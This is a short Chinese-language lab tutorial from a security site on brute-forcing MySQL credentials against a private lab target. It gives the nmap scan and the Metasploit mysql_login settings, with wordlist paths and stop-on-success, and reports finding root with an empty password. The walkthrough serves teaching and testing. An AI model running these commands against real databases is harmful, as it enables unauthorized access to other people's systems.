标题 | 简介 | 类型 | 公开时间 | ||||||||||
|
|||||||||||||
|
|||||||||||||
详情 | |||||||||||||
[SAFE-ID: JIWO-2024-3337] 作者: 影 发表于: [2023-09-13]
本文共 [31] 位读者顶过
1 环境搭建攻击机:kali 靶机IP:192.168.192.132 [出自:jiwo.org] 搭建好环境后,使用nmap探测MySQL环境,命令为:nmap 192.168.192.132,确认3306端口已开启。
2 破解过程2.1 在终端输入msfconsole即可进入msf控制台
2.2 搜索关于MySQL的模块search mysql
2.3 使用mysql_login模块进行破解使用模块:use 16 (此模块的序号为16) 显示参数:show options
配置参数: set RHOSTS 192.168.192.132 //配置远程MySQL服务器的IP地址 set USER_FILE /home/kali/Desktop/director/zzzu.txt //爆破的用户名字典文件路径 set PASS_FILE /home/kali/Desktop/director/zzzp.txt //爆破的密码字典文件路径 set STOP_ON_SUCCESS true //得到正确的用户名和密码后停止运行 运行模块:run
破解成功,得到正确的用户名为root,没有密码。 |